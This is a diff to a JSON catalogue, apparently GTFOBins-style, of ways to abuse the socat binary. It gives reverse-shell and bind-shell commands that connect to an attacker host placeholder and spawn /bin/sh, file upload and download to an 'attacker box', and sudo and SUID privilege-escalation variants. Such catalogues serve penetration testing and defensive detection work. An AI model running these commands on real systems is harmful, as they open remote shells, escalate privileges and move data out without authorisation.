|
|
|
@ -1,27 +1,21 @@
|
|
|
|
|
{
|
|
|
|
|
"functions": {
|
|
|
|
|
"reverse-shell": [
|
|
|
|
|
"shell": [
|
|
|
|
|
{
|
|
|
|
|
"description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
|
|
|
|
|
"code": "socat tcp-connect:[host]:[port] exec:sh,pty,stderr,setsid,sigint,sane\n"
|
|
|
|
|
"description": "The resulting shell is not a proper TTY shell and lacks the prompt.",
|
|
|
|
|
"code": "socat stdin exec:/bin/sh\n"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"bind-shell": [
|
|
|
|
|
{
|
|
|
|
|
"description": "Run 'socat FILE:`tty`,raw,echo=0 TCP:[host]:[port]' on the attacker box to connect to the shell.",
|
|
|
|
|
"code": "socat TCP-LISTEN:[port],reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane\n"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"sudo": [
|
|
|
|
|
"reverse-shell": [
|
|
|
|
|
{
|
|
|
|
|
"description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
|
|
|
|
|
"code": "sudo -E socat tcp-connect:[host]:[port] exec:sh,pty,stderr,setsid,sigint,sane\n"
|
|
|
|
|
"code": "socat tcp-connect:[host]:[port] exec:/bin/sh,pty,stderr,setsid,sigint,sane\n"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"limited-suid": [
|
|
|
|
|
"bind-shell": [
|
|
|
|
|
{
|
|
|
|
|
"description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
|
|
|
|
|
"code": "./socat tcp-connect:[host]:[port] exec:sh,pty,stderr,setsid,sigint,sane\n"
|
|
|
|
|
"description": "Run 'socat FILE:`tty`,raw,echo=0 TCP:[host]:[port]' on the attacker box to connect to the shell.",
|
|
|
|
|
"code": "socat TCP-LISTEN:[port],reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane\n"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"file-upload": [
|
|
|
|
@ -35,6 +29,18 @@
|
|
|
|
|
"description": "Run 'socat -u file:[file] tcp-listen:[port],reuseaddr' on the attacker box to send the file.",
|
|
|
|
|
"code": "socat -u tcp-connect:[host]:[port] open:[file],creat\n"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"sudo": [
|
|
|
|
|
{
|
|
|
|
|
"description": "The resulting shell is not a proper TTY shell and lacks the prompt.",
|
|
|
|
|
"code": "sudo socat stdin exec:/bin/sh\n"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"limited-suid": [
|
|
|
|
|
{
|
|
|
|
|
"description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
|
|
|
|
|
"code": "./socat tcp-connect:[host]:[port] exec:/bin/sh,pty,stderr,setsid,sigint,sane\n"
|
|
|
|
|
}
|
|
|
|
|
]
|
|
|
|
|
}
|
|
|
|
|
}
|